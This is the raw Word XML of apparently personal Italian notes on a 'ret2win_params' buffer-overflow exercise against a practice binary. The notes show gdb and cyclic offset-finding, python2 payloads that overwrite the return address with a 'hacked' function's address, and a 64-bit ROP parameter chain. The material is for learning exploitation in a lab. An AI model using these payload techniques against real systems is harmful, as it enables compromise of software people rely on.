      </w:r>
    </w:p>
    <w:p w14:paraId="4AA61B0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&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61679024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Hi there, AAAAAAAAAAAAAAAAAAAAAAAAAAAA  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11A28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This function is TOP SECRET! How did you get in here?! :O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895BD2A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7386A1BD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Program received signal SIGSEGV, Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7B351" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA6F461" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00AF5671" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rStyle w:val="Titolo1Carattere"/>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>04-ret2win_params:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   32 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52FA11CB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E89697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-&gt; SHELL1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F05F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file ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3CBFC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checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A56FCA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ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -&gt; per analizzare un minimo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE9225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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret2win_params </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F94F5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cyclic 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6665EB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run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60DEFB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425731B4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&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Name: "Output_of_cyclic_200"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A9D3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gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cyclic -l</w:t>
      </w:r>
      <w:proofErr w:type="gram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haaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="660ECE47" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610C5E92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&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Finding cyclic pattern of 4 bytes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'haaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' (hex: 0x68616161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294ECA5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>Found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> offset 28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647351C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="44CD2B5E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disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> --&gt; prendo il primo indirizzo che vedo elencato (ovvero 0x08049182)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0597D5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="079E8253" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>----&gt; SHELL2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA699D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>PAYLOAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2A678" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Il payload sembra essere così composto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A91BC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python2 -c 'print "payload" + "hacked" + "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" + "param_1" + "param_2"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BF830" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8D212E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python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "AAAA" + "BBBB" + "CCCC"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543EB016" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F615AF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&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA9E50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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36881E55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disassemble </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>register_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prendo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0x0804922a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F00705B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ break *0x0804922a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE325DA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run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> &lt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B301163" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ n -&gt; finché non troviamo una comparazione (n sta per next)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17B9BD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ x $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> + 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D5909" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">&gt;&gt; 0x42424242 --&gt; sarebbero le BBBB in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F8D6BC9" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Visto che il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>cmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> non va a buon fine non vedremo mai le CCCC ma andremo direttamente al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F6CDCBB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>perciò sostituiamo le BBBB con \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E5CBC2F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="46AC5780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&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5B03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lastRenderedPageBreak/>
        <w:t>$ python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "junk" + "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" + "CCCC"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B667C08" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B12C6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&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900472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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret2win_params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB75D32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break *0x0804922a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077F0489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run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> &lt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDDA62E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ n -&gt; finché non troviamo una comparazione (n sta per next)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D0536" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ x $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> + 0xc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD9B92" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">&gt;&gt; 0x43434343 --&gt; Sarebbero le CCCC in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4745F74C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="622CEE7B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&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C5D6A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python2 -c 'print 28 * "A" + "\x82\x91\x04\x08" + "junk" + "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" + "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a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xc0"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C882B5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574B42E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----&gt; SHELL 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D518594" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ret2win_params &lt; payload --&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fatto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>Notiamo che l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>inidirizzo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> di ritorno non è</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E88C9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tab/>
        <w:t>importante, ho messo junk giusto perchè sono 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005250FA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tab/>
        <w:t>byte che seppur invalidi rispettano la lunghezza</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F94502" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="25D954CA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="1D96A360" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">04-ret2win_params:   64 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3706531F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08AF9D6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&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5436941E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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD2DF8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$ cyclic 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C39729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run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDC91F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&gt;&gt; Name: "output_of_cyclic_100"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174981EE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cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>gaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> (nel mio caso ho dovuto scrivere </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>daaaaaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> e non </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>gaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A4EDD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&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Finding cyclic pattern of 8 bytes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'daaaaaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78807875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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>(hex: 0x6461616161616161)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A0A3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ab/>
        <w:t>Found at offset 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7787384C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disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t xml:space="preserve">prendo l'indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r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tab/>
        <w:t>0x0000000000401142 e lo inverto a due a due</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1987A4BD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x42\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C79425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rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B0CB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----&gt; SHELL 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63745219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Come sara il payload? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E861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padding + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + param_1 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop_rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + param_2 + hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9ECC1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792C72E4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param_1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deadbeef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; 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 xml:space="preserve"> -&gt; x2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>essendo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a 64 bit -&gt; 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</w:p>
    <w:p w14:paraId="394084CF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B33D1B0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python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E003AA3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"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 xml:space="preserve">" + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D62FB2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
